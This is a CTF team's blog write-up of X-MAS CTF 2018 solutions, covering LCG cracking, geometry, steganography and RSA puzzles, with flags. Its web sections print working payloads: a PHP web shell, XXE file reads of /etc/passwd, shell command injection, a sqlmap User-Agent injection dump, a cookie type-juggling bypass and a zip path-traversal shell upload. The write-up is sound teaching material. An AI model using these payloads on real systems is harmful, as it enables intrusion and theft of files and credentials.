Dec 22, 2018 · 13 min read

X-MAS CTF is a week-long Capture The Flag competition created by Romanian high-school CTF Team named HTsP (`Hecării, Țuica și Păunii`).
Our team hackstreetboys participated and managed to finish 10th place out of 1378 teams.

# Web/Crypto

This category should only have 1 challenge called Let’s Crack the Great lapland but some participants managed to brute force or guess the next value that’s why the authors created another challenge called Let’s Crack the Greater lapland that can be solved using the intended solution.

## Let’s Crack the Great lapland

“Psst, I got a task for you. There’s this monolith to which I need to get access, but I can’t get the numbers right. Can you help me? I pay well.” ~ A shady dealer gnome

Server: http://199.247.6.180:12000
Authors: Milkdrop + Gabies

## Let’s Crack the Greater lapland

“Hey, do you remember that monolith I had to get in last week? Now I stumbled upon something greater and shinier! Can you help me get access to this one?” ~ The same shady dealer gnome

Server: http://199.247.6.180:12006
Authors: Milkdrop + Gabies

## Solution

By carefully observing the challenge title, we found out that this is about LCG. (Let’s Crack the Great lapland)

Linear Congruential Generator or LCG is an algorithm that yields a sequence of pseudo–randomized numbers calculated with a discontinuous piecewise linear equation.

The generator is defined by recurrence relation:`x(n+1) = a*x(n) + b mod m `where `x` is the sequence of pseudorandom values, `m` is the modulo, `a` is the multiplier, and `b` is the increment.

The objective is collect the first few set of sequence numbers from the webpage and use it to get the modulo, multiplier, and increment.

By the way, Thanks to mcm of p4 team for creating a detailed blog post about LCG. https://tailcall.net/blog/cracking-randomness-lcgs/

To get the modulo, the following code was used:

`for element in range(len(x) - 1):    y.append(x[element + 1] - x[element])for element in range(len(y) - 2):    z.append(abs(y[element + 2] * y[element] - y[element + 1] ** 2))m = gcd(gcd(z[0], z[1]), z[2])`

To get the multiplier, the following code was used:

`a = (x[2] - x[1]) * invert(x[1] - x[0], n) % n`

To get the increment, the following code was used:

`b = (x[1] - a * x[0]) % n`

Once the modulo, multiplier, and increment is obtained, we can use the following formula to predict the next numbers of the monolith.

`x(n+1) = a*x(n) + b mod m`

## Flags

Let’s Crack the Great lapland
`X-MAS{LCG_0n_7h3_LapL4nd_m0n0LiTh_1s_n0t_7ha7_s3cur3}`

Let’s Crack the Greater lapland
`X-MAS{Bru73_F0rc3_1s_gr34t_bu7_LCG_1s_b3tt3r___}`

# Web

Most of the challenges were fun but there was a challenge that was not good at all because you’ll just need to change the value of a parameter and you’ll get the flag.

## GnomeArena: Rock Paper Scissors

This challenge was solved by my other teammate, either SymR or Ameer.

This new website is all the rage for every gnome in Lapland! How many games of Rock Paper Scissors can you win?

Server: http://199.247.6.180:12002
Author: Milkdrop

## Solution

• The website is about Rock, Paper, and Scissors game but I noticed that there’s a settings page and it allows us to upload file and modify our game name.
• After analyzing the settings page, I learned that the GAME NAME is the FILE NAME of the PROFILE IMAGE and I can upload php files as PROFILE IMAGE.
`<?php system(\$_GET[‘cmd’]); ?>`

Flag: `X-MAS{Ev3ry0ne_m0ve_aw4y_th3_h4ck3r_gn0m3_1s_1n_t0wn}`

## Gnome’s BU77ons

This challenge was solved by my other teammate, either SymR or Ameer.

Who wouldn’t enjoy pressing random buttons? Yeah, i guessed so! This time though, the bu77on isn’t random…

Server: http://199.247.6.180:12004

## Solution

• Just change the value of button parameter from Click here boai to flag.

Flag: `X-MAS{PhPs_A1n7_m4d3_f0r_bu77_0ns___:)}`

## Our Christmas Wishlist

We have all gathered round to write down our wishes and desires for this Christmas! Please don’t write anything mean, Santa will be reading this!

Server: http://199.247.6.180:12001
Author: Milkdrop

## Solution

• Based on the POST Request, the data to be posted has the content type of application/xml. Therefore, this challenge could possibly vulnerable to XML External Entity or also known as XXE.
• Using the following payload, we were able to retrieve the passwd file.
`<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><message>&xxe;</message>`
• Using the following payload below, we were able to obtain the flag.
`<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=flag.txt">]><message>&xxe;</message>`

Flag: `X-MAS{_The_Ex73rnal_Ent1t13\$_W4n7_To__Jo1n_7he_p4r7y__700______}`

## Santa’s Helper Mechagnome

One of our main production Mechagnomes is now malfunctioning. You have to access its control panel by directly messaging Helper Mechagnome#9926 (You can find him resting on our main discord server).

Get the restart codes, and restart it so that our toy factory can continue working!

Author: Milkdrop

## Solution

• MechaGnome #9926 Control panel can execute the following commands: help, joke, add, list, sendletter, restart.
• The only important commands are list, sendletter, and restart.
• Executing list command will give us this emails:
`- randdev@santa.com - toyfactory@santa.com - weaponsilo@santa.com - commandcenter@santa.com - test@santa.com - LOLOLOL@santa.com`
• Executing sendletter command requires two parameters: email and message. (sendletter email message)
• After trying many payloads in message parameter, the following command gives us the list of files in the control panel.
`sendletter commandcenter@santa.com *`
`mecha.py robot_restart_codes.txt`
• Executing the following command will give us the content of robot_restart_codes.txt.
`sendletter commandcenter@santa.com \$(cat robot_restart_codes.txt)`
`Cobalt Inc. MechaGnome Restart Codes:\r XJACO-10U4C-C091U-VNOAC-J2QCS`
• Executing `restart XJACO-10U4C-C091U-VNOAC-J2QCS` will restart the BOT and gives us the flag.

Flag: `X-MAS{Wh0_Kn3W_4_H3lp3r_M3ch4gN0m3_W0uLd_b3_S0_vULN3R4bL3}`

## Santa’s lucky number

This challenge was solved by my other teammate, either SymR or Ameer.

Come on! Santa’s lucky number is pretty predictable, don’t you think? ;)

Server: http://199.247.6.180:12005

## Solution

• Visiting the website will greet us with an image of book and 3 buttons and a hint: `Santa loves hiding his secrets on the page numbered as his lucky number :)`
• Clicking each button will give us a random hash.
• Using BurpSuite Intruder, I sequentially requested the page number ranging from 0 to 5,000 and found out that page number 1327 triggers our Grep Match option that returns the flag.

Flag: `X-MAS{W00pS_S0m30n3_73l1_S4n7a_h1s_c00k1eS_Ar3_BuRn1ng}`

Ameer and I collaborated to solve this challenge. Ameer found that User-Agent is vulnerable to Blind SQL Injection.

We all know that Santa is quite an old man. He sometimes forgets things. Including his password.

Therefore, our high-tech gnomegineer department worked the whole last night to develop a new login system, that requires no passwords! Nifty.

Server: http://199.247.6.180:12003
Author: Milkdrop

## Solution

• Hint in the challenge is “You don’t seem to be using an official Computer from Santa’s Laboratory!” and it means that we have to do something in the user-agent.
• Adding `‘ or ‘1’=’1` to user-agent change the “Access Denied!” to “Welcome!
• Using sqlmap, we found out that the user-agent is vulnerable to `boolean-based blind`, `error-based` and `AND/OR time-based` SQL Injection.
• The following command was executed to dump the flag from the database
`sqlmap.py -u http://199.247.6.180:12003/ --user-agent="' *" --level=5 --risk=3 --dbms=mysql --dump`

Flag: `X-MAS{EV3RY0NE_F34R5_TH3_BL1ND_GN0M3}`

Ameer solved this challenge because I fell asleep and forgot to submit the flag hihi.

Server: http://199.247.6.180:12008

## Solution

• There are two cookies in the website, one is named as `adminpass` and the second one is name as `cookiez`.
• the value of `cookiez` is encoded in `base64` 3 times and the readable value is `{“id”:”2",”type”:”guest”}`.
• I changed the value of `cookiez` to `{“id”:”1",”type”:”admin”}` and encoded it 3 times.
• Going back to `adminpass` cookie, I just added this `[]` to make it like this: `adminpass[]` why? because PHP translates variables like this to an empty array. Luckily, this challenge is using strcmp() to compare our cookie to 0. Also, it uses Loose Comparison of PHP Type Juggling, so if we have an empty array which is NULL and 0 for comparison it will return true.
`NULL == 0 will return true`.
`Cookie: adminpass[]=MyLittleCookie!; cookiez=WlhsS2NGcERTVFpKYWtWcFRFTktNR1ZZUW14SmFtOXBXVmRTZEdGWE5HbG1VVDA5Q2c9PQo=;`

Flag: `X-MAS{S4n74_L0v35__C00kiesss_And_Juggl1ng!}`

## Super Secure Siberian Vault

Ever wondered where Santa might keep his most personal secrets? In the most securized Siberian vault of course! Today, the concrete and steel facility has opened to the public, and you can now use it to safeguard your very own personal secrets too, just like Santa!

Pro Tip: You can upload archives to store multiple secrets at the same time.

Server: 199.247.6.180:12007

## Solution

• The tip (or hint) gives us an idea that the file type we need to upload is an archive. It could be tar, xz, jar, rar, zip, etc.
• I tried a lot just to determine which kind of archive should I use for this attack and decided to stick with zip to save time. Also, the Vault accepts archives up to 2KB only.
• I tried Zip Symlink but no success. Then, I found this blog about Directory Traversal in Archives. Basically, we can perform directory traversal inside the zip file and the PHP script will help us execute the exploit when they decompress it.
• In the blog mentioned above, they wrote a python script that will create a zip file that contains files with directory traversal as file name. Using this script, we were able to create the payload.
`./evilarc.py hackstreetboys.php -p img -o unix -d 2-p = Path to include in filename after traversal.-o = OS platform for archive (you can choose either win or unix)-d = Number directories to traverse.`
• The command above will create an `evil.zip` and after uploading this to the website, the PHP script will decompress the zip file and store the `hackstreetboys.php` to `img` directory.
• To access the uploaded file, we need to visit this link: `http://199.247.6.180:12007/img/hackstreetboys.php` and we can now finally perform command execution.
• Final link is `http://199.247.6.180:12007/img/hackstreetboys.php?cmd=cat ../flag.txt`

Flag: `X-MAS{Z1pp3r_D0wn_S4nt4!_Y0ur_Secr3t5_4r3_n0w_0ur5}`

# Others

## MISC: Weird Transmission

This challenge is one of the hardest challenge with only over 20 teams managed to solve it including our team.

We have intercepted a weird transmission coming from an unidentified radio station from the North Pole. Please decode it for us, it seems important.

transmission.mp3

Author: PinkiePie1189

## Solution

• Playing the audio file will greet us with a voice of a male person however we cannot clearly understand him. Fortunately, reversing the audio will help us understand him and his message.
• Transcribing the audio will give us this message:
`Dear CTF player, you have exploited littlewho's binaries, deciphered Gabies' cryptography, hack your way into Milkdrop's websites and done some forensic analysis with Googal, now another challenge awaits.The evil Grinch is holding Santa hostage in an undisclosed location we don't know his exact position.With a nice elf has told us the coordinates of nearby points.The first one is located at (511716656388765455430016138955706839007890052532, 1622805609316535864254436412730925222158623332074)The second one is at(390390142500834541752332649936545354218395003257, 176460719206642987153469086794475382972064519404)And the last one is at(608097554835704767294367078594102923662585120876, 195121033653477539025103641752423493583135321761)He also told us that Santa's home will be located where the shape formed by these three points is in complete equilibrium.Good luck and Merry Christmas.`
• Plotting those coordinates to world’s map will give us nothing and just a clear rabbit hole.
• I requested a hint and they told me that this is a geometry challenge.
• I quickly searched on Google for formulas related to Geometry and found Analytic Geometry’s formula in calculating the centroid mainly because it uses the given coordinates of the three vertices of a triangle.
• The following is the final formula to calculate the centroid.
`centroid = ((x1 + x2 + x3)/3, (y1 + y2 + y3)/3);`
• The following is the simple python script that calculates the centroid of the given coordinates from the audio.
`x1 = 511716656388765455430016138955706839007890052532;x2 = 390390142500834541752332649936545354218395003257;x3 = 608097554835704767294367078594102923662585120876;y1 = 1622805609316535864254436412730925222158623332074y2 = 176460719206642987153469086794475382972064519404;y3 = 195121033653477539025103641752423493583135321761;centroid = ((x1 + x2 + x3)/3, (y1 + y2 + y3)/3);print centroid`
• The result is `(503401451241768254825571955828785038962956725555, 664795787392218796811003047092608032904607724413)`
• The value of centroid above is in decimal format (base 10) and I had to convert it to HEX (base 16) and converted it to ASCII to get the flag.

Flag: `X-MAS{An4ly71c_G30m3try_S4v3d_Chr157m4s}`

## FORENSICS: Hidden in almost plain sight

My teammate hightail and I solved this challenge. At first, we thought that this is an easy challenge because you will just do a simple forensic in a picture but it turned out that this was a steganography challenge.

A strange file was sent to Santa’s email address and he is puzzled. Help him find what’s wrong with the file and you can keep any flag you find in the process.

## Solution

• A file named celebration was given in the challenge.
• After checking the header of the file, I noticed a familiar hex signature.
• The `2nd` and `3rd` byte of the file is missing but I already know that this is a PNG file because `89 XX XX 47 0d 0a 1a 0a` is the hex signature of PNG.
• Adding `50 4E` in the `2nd` and `3rd` byte will give us this image.
• Wasted too much time trying different steg tools to solve this challenge so I asked for a hint and they told me that I need to adjust something in the image.
• Using TweakPNG, I edited the height of the image and I finally obtain the flag.

Flag: `X-MAS{who_knows_wh3re_s4anta_hid3s_the_g1fts}`

## CRYPTO: Special Christmas Wishlist

My teammate hawkcurry (Legend in Crypto) solved this and I decided to give it a shot (lol) ‘coz I wanna learn crypto (but it’s hard).

While Santa was looking through the wishlists of the childern all around the world he came across a very strange looking one. Help Santa decode the letter in order to fulfill the wishes of this child.

(Flag is Non-Standard)
wishlist.png

UPDATE: flag is lowercase!
Author: Gabies

## Solution

• My teammate hawkcurry told us that the 2nd line from the bottom is “the flag is”.
• Using the hint, I converted the symbols of the 2nd line from the bottom to letters. Then I started tracing other symbols with the help of known symbols.

Flag: `X-MAS{youaresogoodatsubstitutionciphers}`

We, hackstreetboys, collaborated to solve this challenge.

Authors: Milkdrop + Gabies + PinkiePie1189

## Solution:

• This challenge gave us a file. Based on its content, the authors xored the file.
• Using xortool, we brute-forced the file using 256 possible keys and found out that the file was XORed with FF.
• After brute-forcing, we executed `file *` and we discovered something interesting. A Game Boy Advance ROM image.
• We grabbed the hex signature `7f00 00ea 24ff ae51 699a a221 3d84 820a` of the file and searched on Google for it’s file extension.
• The file extension is `.gba` and to open that file, we need an emulator. Then, we found Boycott Advance emulator and use it make the game works.
• Then when we tried to leave the town, Prof. Oak approached our character and went to the Lab.
• Prof. Oak introduced us to 3 Poke balls that contains different Pokemons.
• Each Pokemons has their own weird name.
• Then we noticed that the variable/parameter n, e, and c are somehow related to RSA.
• We confirmed this after checking the email on the computer.
• Hint is Rapid Secure Alternoflux keys = RSA keys
• So we copied the value of n, e, and c to put it on our script and solve the RSA to capture the flag.

Flag: `X-MAS{Wh4t_4n_un3xp3ct3d_chr1stm45_pr3s3nt}`

First of all, X-MAS CTF 2018 was really challenging and fun because they were surprisingly well built challenges.

Also, I’d like to say that I am proud to my teammates because they spent some of their time this holiday season just to solve challenges in Pwn, Web, Forensics, Misc, Crypto, and Reverse Engineering.

Finally, I hope you learned something on this blog. As always folks, thank you for reading!!!

Update: My teammate hawkcurry published his writeup for Crypto challenges. Read on: https://github.com/pberba/ctf-solutions/tree/master/20181223_xmasctf

Written by

## hackstreetboys

#### hackstreetboys aka [hsb] is a CTF team from the Philippines

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just \$5/month. Upgrade